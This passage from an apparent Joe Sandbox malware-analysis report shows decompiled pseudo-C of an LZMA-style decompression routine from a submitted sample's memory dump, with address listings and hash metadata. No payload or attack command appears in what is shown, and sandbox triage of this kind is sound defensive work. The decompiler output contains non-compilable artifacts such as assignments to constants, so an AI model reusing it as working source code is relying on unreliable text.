                      													 *(__ebp - 0x2c) = __eax;
                      													__eax =  *(__ebp - 4);
                      													__eax =  *(__ebp - 4) + 0x644;
                      													__eflags = __eax;
                      													L108:
                      													__ebx = 0;
                      													 *(__ebp - 0x58) = __eax;
                      													 *(__ebp - 0x50) = 1;
                      													 *(__ebp - 0x44) = 0;
                      													 *(__ebp - 0x48) = 0;
                      													L112:
                      													__eax =  *(__ebp - 0x40);
                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      														L118:
                      														_t391 = __ebp - 0x2c;
                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      														__eflags =  *_t391;
                      														goto L119;
                      													}
                      													L113:
                      													__eax =  *(__ebp - 0x50);
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      													__eax =  *(__ebp - 0x58);
                      													__esi = __edi + __eax;
                      													 *(__ebp - 0x54) = __esi;
                      													__ax =  *__esi;
                      													__ecx = __ax & 0x0000ffff;
                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      													__eflags =  *(__ebp - 0xc) - __edx;
                      													if( *(__ebp - 0xc) >= __edx) {
                      														__ecx = 0;
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      														__ecx = 1;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      														__ebx = 1;
                      														__ecx =  *(__ebp - 0x48);
                      														__ebx = 1 << __cl;
                      														__ecx = 1 << __cl;
                      														__ebx =  *(__ebp - 0x44);
                      														__ebx =  *(__ebp - 0x44) | __ecx;
                      														__cx = __ax;
                      														__cx = __ax >> 5;
                      														__eax = __eax - __ecx;
                      														__edi = __edi + 1;
                      														__eflags = __edi;
                      														 *(__ebp - 0x44) = __ebx;
                      														 *__esi = __ax;
                      														 *(__ebp - 0x50) = __edi;
                      													} else {
                      														 *(__ebp - 0x10) = __edx;
                      														0x800 = 0x800 - __ecx;
                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      														 *__esi = __dx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L111:
                      														_t368 = __ebp - 0x48;
                      														 *_t368 =  *(__ebp - 0x48) + 1;
                      														__eflags =  *_t368;
                      														goto L112;
                      													} else {
                      														L117:
                      														goto L109;
                      													}
                      												}
                      												L103:
                      												__ecx =  *(__ebp - 0xc);
                      												__ebx = __ebx + __ebx;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      													__ecx =  *(__ebp - 0x10);
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													__ebx = __ebx | 0x00000001;
                      													__eflags = __ebx;
                      													 *(__ebp - 0x44) = __ebx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													L101:
                      													_t338 = __ebp - 0x48;
                      													 *_t338 =  *(__ebp - 0x48) - 1;
                      													__eflags =  *_t338;
                      													goto L102;
                      												} else {
                      													L106:
                      													goto L99;
                      												}
                      											}
                      											L96:
                      											__edx =  *(__ebp - 4);
                      											__eax = __eax - __ebx;
                      											 *(__ebp - 0x40) = __ecx;
                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      											goto L108;
                      										case 0x1a:
                      											L56:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												L162:
                      												 *(__ebp - 0x88) = 0x1a;
                      												goto L170;
                      											}
                      											L57:
                      											__ecx =  *(__ebp - 0x68);
                      											__al =  *(__ebp - 0x5c);
                      											__edx =  *(__ebp - 8);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      											 *( *(__ebp - 0x68)) = __al;
                      											__ecx =  *(__ebp - 0x14);
                      											 *(__ecx +  *(__ebp - 8)) = __al;
                      											__eax = __ecx + 1;
                      											__edx = 0;
                      											_t192 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t192;
                      											goto L80;
                      										case 0x1b:
                      											L76:
                      											__eflags =  *(__ebp - 0x64);
                      											if( *(__ebp - 0x64) == 0) {
                      												L163:
                      												 *(__ebp - 0x88) = 0x1b;
                      												goto L170;
                      											}
                      											L77:
                      											__eax =  *(__ebp - 0x14);
                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      											__eflags = __eax -  *(__ebp - 0x74);
                      											if(__eax >=  *(__ebp - 0x74)) {
                      												__eax = __eax +  *(__ebp - 0x74);
                      												__eflags = __eax;
                      											}
                      											__edx =  *(__ebp - 8);
                      											__cl =  *(__eax + __edx);
                      											__eax =  *(__ebp - 0x14);
                      											 *(__ebp - 0x5c) = __cl;
                      											 *(__eax + __edx) = __cl;
                      											__eax = __eax + 1;
                      											__edx = 0;
                      											_t275 = __eax %  *(__ebp - 0x74);
                      											__eax = __eax /  *(__ebp - 0x74);
                      											__edx = _t275;
                      											__eax =  *(__ebp - 0x68);
                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      											_t284 = __ebp - 0x64;
                      											 *_t284 =  *(__ebp - 0x64) - 1;
                      											__eflags =  *_t284;
                      											 *( *(__ebp - 0x68)) = __cl;
                      											L80:
                      											 *(__ebp - 0x14) = __edx;
                      											goto L81;
                      										case 0x1c:
                      											while(1) {
                      												L123:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													break;
                      												}
                      												L124:
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t414 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t414;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      												__eflags =  *(__ebp - 0x30);
                      												 *( *(__ebp - 0x68)) = __cl;
                      												 *(__ebp - 0x14) = _t414;
                      												if( *(__ebp - 0x30) > 0) {
                      													continue;
                      												} else {
                      													L127:
                      													L81:
                      													 *(__ebp - 0x88) = 2;
                      													goto L1;
                      												}
                      											}
                      											L167:
                      											 *(__ebp - 0x88) = 0x1c;
                      											goto L170;
                      									}
                      								}
                      								L171:
                      								_t539 = _t538 | 0xffffffff;
                      								goto L172;
                      							}
                      						}
                      					}
                      				}
                      			}















                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00406688
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x0040678a
                      0x00406745
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00000000
                      0x0040646a
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x0040678a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004064af
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x00406548
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004067b4
                      0x0040677d

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                      • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                      • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                      • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406682() {
                      				void _t533;
                      				signed int _t534;
                      				signed int _t535;
                      				signed int* _t605;
                      				void* _t612;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t612 - 0x40) != 0) {
                      						 *(_t612 - 0x84) = 0x13;
                      						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                      						goto L132;
                      					} else {
                      						__eax =  *(__ebp - 0x4c);
                      						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      						__ecx =  *(__ebp - 0x58);
                      						__eax =  *(__ebp - 0x4c) << 4;
                      						__eax =  *(__ebp - 0x58) + __eax + 4;
                      						L130:
                      						 *(__ebp - 0x58) = __eax;
                      						 *(__ebp - 0x40) = 3;
                      						L144:
                      						 *(__ebp - 0x7c) = 0x14;
                      						L145:
                      						__eax =  *(__ebp - 0x40);
                      						 *(__ebp - 0x50) = 1;
                      						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      						L149:
                      						if( *(__ebp - 0x48) <= 0) {
                      							__ecx =  *(__ebp - 0x40);
                      							__ebx =  *(__ebp - 0x50);
                      							0 = 1;
                      							__eax = 1 << __cl;
                      							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      							__eax =  *(__ebp - 0x7c);
                      							 *(__ebp - 0x44) = __ebx;
                      							while(1) {
                      								L140:
                      								 *(_t612 - 0x88) = _t533;
                      								while(1) {
                      									L1:
                      									_t534 =  *(_t612 - 0x88);
                      									if(_t534 > 0x1c) {
                      										break;
                      									}
                      									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                      										case 0:
                      											if( *(_t612 - 0x6c) == 0) {
                      												goto L170;
                      											}
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                      											_t534 =  *( *(_t612 - 0x70));
                      											if(_t534 > 0xe1) {
                      												goto L171;
                      											}
                      											_t538 = _t534 & 0x000000ff;
                      											_push(0x2d);
                      											asm("cdq");
                      											_pop(_t569);
                      											_push(9);
                      											_pop(_t570);
                      											_t608 = _t538 / _t569;
                      											_t540 = _t538 % _t569 & 0x000000ff;
                      											asm("cdq");
                      											_t603 = _t540 % _t570 & 0x000000ff;
                      											 *(_t612 - 0x3c) = _t603;
                      											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                      											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                      											_t611 = (0x300 << _t603 + _t608) + 0x736;
                      											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                      												L10:
                      												if(_t611 == 0) {
                      													L12:
                      													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                      													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                      													goto L15;
                      												} else {
                      													goto L11;
                      												}
                      												do {
                      													L11:
                      													_t611 = _t611 - 1;
                      													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                      												} while (_t611 != 0);
                      												goto L12;
                      											}
                      											if( *(_t612 - 4) != 0) {
                      												GlobalFree( *(_t612 - 4));
                      											}
                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                      											 *(_t612 - 4) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                      												goto L10;
                      											}
                      										case 1:
                      											L13:
                      											__eflags =  *(_t612 - 0x6c);
                      											if( *(_t612 - 0x6c) == 0) {
                      												 *(_t612 - 0x88) = 1;
                      												goto L170;
                      											}
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                      											_t45 = _t612 - 0x48;
                      											 *_t45 =  *(_t612 - 0x48) + 1;
                      											__eflags =  *_t45;
                      											L15:
                      											if( *(_t612 - 0x48) < 4) {
                      												goto L13;
                      											}
                      											_t546 =  *(_t612 - 0x40);
                      											if(_t546 ==  *(_t612 - 0x74)) {
                      												L20:
                      												 *(_t612 - 0x48) = 5;
                      												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                      												goto L23;
                      											}
                      											 *(_t612 - 0x74) = _t546;
                      											if( *(_t612 - 8) != 0) {
                      												GlobalFree( *(_t612 - 8));
                      											}
                      											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                      											 *(_t612 - 8) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												goto L20;
                      											}
                      										case 2:
                      											L24:
                      											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                      											 *(_t612 - 0x84) = 6;
                      											 *(_t612 - 0x4c) = _t553;
                      											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                      											goto L132;
                      										case 3:
                      											L21:
                      											__eflags =  *(_t612 - 0x6c);
                      											if( *(_t612 - 0x6c) == 0) {
                      												 *(_t612 - 0x88) = 3;
                      												goto L170;
                      											}
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											_t67 = _t612 - 0x70;
                      											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                      											__eflags =  *_t67;
                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                      											L23:
                      											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                      											if( *(_t612 - 0x48) != 0) {
                      												goto L21;
                      											}
                      											goto L24;
                      										case 4:
                      											L133:
                      											_t531 =  *_t605;
                      											_t588 = _t531 & 0x0000ffff;
                      											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                      											if( *(_t612 - 0xc) >= _t564) {
                      												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                      												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                      												 *(_t612 - 0x40) = 1;
                      												_t532 = _t531 - (_t531 >> 5);
                      												__eflags = _t532;
                      												 *_t605 = _t532;
                      											} else {
                      												 *(_t612 - 0x10) = _t564;
                      												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                      												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                      											}
                      											if( *(_t612 - 0x10) >= 0x1000000) {
                      												goto L139;
                      											} else {
                      												goto L137;
                      											}
                      										case 5:
                      											L137:
                      											if( *(_t612 - 0x6c) == 0) {
                      												 *(_t612 - 0x88) = 5;
                      												goto L170;
                      											}
                      											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                      											L139:
                      											_t533 =  *(_t612 - 0x84);
                      											goto L140;
                      										case 6:
                      											__edx = 0;
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x34) = 1;
                      												 *(__ebp - 0x84) = 7;
                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      												goto L132;
                      											}
                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      											__esi =  *(__ebp - 0x60);
                      											__cl = 8;
                      											__cl = 8 -  *(__ebp - 0x3c);
                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      											__ecx =  *(__ebp - 0x3c);
                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      											__ecx =  *(__ebp - 4);
                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      											__eflags =  *(__ebp - 0x38) - 4;
                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											if( *(__ebp - 0x38) >= 4) {
                      												__eflags =  *(__ebp - 0x38) - 0xa;
                      												if( *(__ebp - 0x38) >= 0xa) {
                      													_t98 = __ebp - 0x38;
                      													 *_t98 =  *(__ebp - 0x38) - 6;
                      													__eflags =  *_t98;
                      												} else {
                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      												}
                      											} else {
                      												 *(__ebp - 0x38) = 0;
                      											}
                      											__eflags =  *(__ebp - 0x34) - __edx;
                      											if( *(__ebp - 0x34) == __edx) {
                      												__ebx = 0;
                      												__ebx = 1;
                      												goto L61;
                      											} else {
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__ecx =  *(__ebp - 8);
                      												__ebx = 0;
                      												__ebx = 1;
                      												__al =  *((intOrPtr*)(__eax + __ecx));
                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      												goto L41;
                      											}
                      										case 7:
                      											__eflags =  *(__ebp - 0x40) - 1;
                      											if( *(__ebp - 0x40) != 1) {
                      												__eax =  *(__ebp - 0x24);
                      												 *(__ebp - 0x80) = 0x16;
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												__eax =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xa;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      												__eax =  *(__ebp - 4);
                      												__eax =  *(__ebp - 4) + 0x664;
                      												__eflags = __eax;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L69;
                      											}
                      											__eax =  *(__ebp - 4);
                      											__ecx =  *(__ebp - 0x38);
                      											 *(__ebp - 0x84) = 8;
